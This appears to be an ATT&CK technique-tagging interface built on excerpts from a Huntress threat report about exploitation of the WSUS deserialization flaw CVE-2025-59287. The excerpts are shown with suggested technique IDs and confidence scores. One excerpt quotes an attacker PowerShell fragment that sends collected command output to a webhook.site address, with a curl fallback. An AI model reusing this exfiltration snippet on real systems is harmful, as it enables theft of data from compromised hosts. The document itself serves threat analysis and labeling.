“- update - agent - 200 during tactical response engagements to active exploitation, huntress noted the use of proxy networks being leveraged to conduct exploitation. attacker tradecraft beginning at around 2025 - 10 - 23 23 : 34 utc, alerts were triggered for suspicious activity.…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1059.001PowerShell
79%
“a deserialization rce against the update service. - exploitation activity included spawning command prompt and powershell via the http worker process and wsus service binary : ( process chains observed ) - wsusservice. exe → cmd. exe → cmd. exe → powershell. exe - w3wp. exe → cmd…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1068Exploitation for Privilege Escalation
52%
“exploitation of windows server update services remote code | huntress acknowledgments : special thanks to luke wilkinson, joshua kiriakoff, and jordan sexton for their contributions to this investigation and writeup. tl ; dr : huntress has observed threat actors exploiting a micr…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1059.007JavaScript
49%
“by a threat actor to run a deserialized attack against the authorizationcookie known as cve - 2025 - 59287 ( https : / / nvd. nist. gov / vuln / detail / cve - 2025 - 59287 ) the blog by hawktrace ( " cve - 2025 - 59287 — wsus unauthenticated remote code execution " ( https : / /…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1190Exploit Public-Facing Application
40%
“thrown by the target of an invocation. errorwsusservice. 9hmtwebservices. checkreportingwebservicereporting webservice webexception : system. net. webexception : unable to connect to the remote server c : \ inetpub \ logs \ logfiles \ w3svc * \ u _ ex *. log post / reportingwebse…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1190Exploit Public-Facing Application
34%
“} | out - string ) + $ error } catch { $ _. tostring ( ) } ; $ w = " http : / / webhook. site / [ redacted ] " ; try { iwr - usebasicparsing - uri $ w - body $ r - method put } catch { curl. exe - k $ w - - data - binary $ r } figure 2 : w3wp. exe → cmd. exe → cmd. exe → powershe…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1055.001Dynamic-link Library Injection
33%
“a deserialization rce against the update service. - exploitation activity included spawning command prompt and powershell via the http worker process and wsus service binary : ( process chains observed ) - wsusservice. exe → cmd. exe → cmd. exe → powershell. exe - w3wp. exe → cmd…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
Summary
Huntress has observed threat actors exploiting a Microsoft Windows Server Update Services (WSUS) vulnerability (CVE-2025-59287).